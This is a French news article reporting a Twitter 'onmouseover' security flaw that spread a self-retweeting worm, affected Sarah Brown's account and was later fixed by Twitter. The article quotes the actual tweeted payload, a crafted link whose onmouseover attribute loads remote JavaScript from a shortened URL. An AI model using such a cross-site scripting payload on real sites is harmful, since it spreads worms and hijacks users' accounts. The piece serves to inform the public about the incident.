Une faille de sécurité a infecté Twitter ce mardi. Ce bug a affecté de nombreux comptes, et notamment celui de Sarah Brown, la femme de l’ex-Premier ministre britannique Gordon Brown, signale le site spécialisé Sophos. Twitter a annoncé avoir réparé le bug vers 16h (heure belge).

Cette faille, qui semble se limiter aux utilisateurs de Twitter via le site Twitter.com et non via des sites ou applications clientes comme Tweetdeck ou Seesmic, se présenterait sous la forme d’un bug “onmouseover” : chaque passage avec la souris sur le lien corrompu déclencherait l’ouverture d’une fenêtre pop-up, qui renvoie vers un site tiers, comme le signale Mashable. Un passage sur ce lien transférerait en outre le message à ses propres contacts.

“Un ver sur Twitter se propage : il semblerait que des liens effectuent des RT – retweets automatiques- dès qu’on passe dessus. Attention ! Evitez la version web !” indiquait CNET.com
Sur le compte de Sarah Brown, cette fenêtre redirigeait l’internaute vers un site de photos pornographiques au Japon. De nombreux tweets envoyés cet après-midi se limitaient à ce message “http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7’)”/”, qui semble indiquer que le compte en question a été victime de la faille.

Cité par l’AFP, Twitter a annoncé que l'”attaque” avait été “identifiée” et la faille “entièrement corrigée”. Depuis la semaine dernière, Twitter lance progressivement une nouvelle version de son site. Il semble que ce soit à l’occasion de cette mise à jour que la faille soit apparue.

L’info sur Numerama.com ; LeFigaro.fr ; Journal Du Geek; The Guardian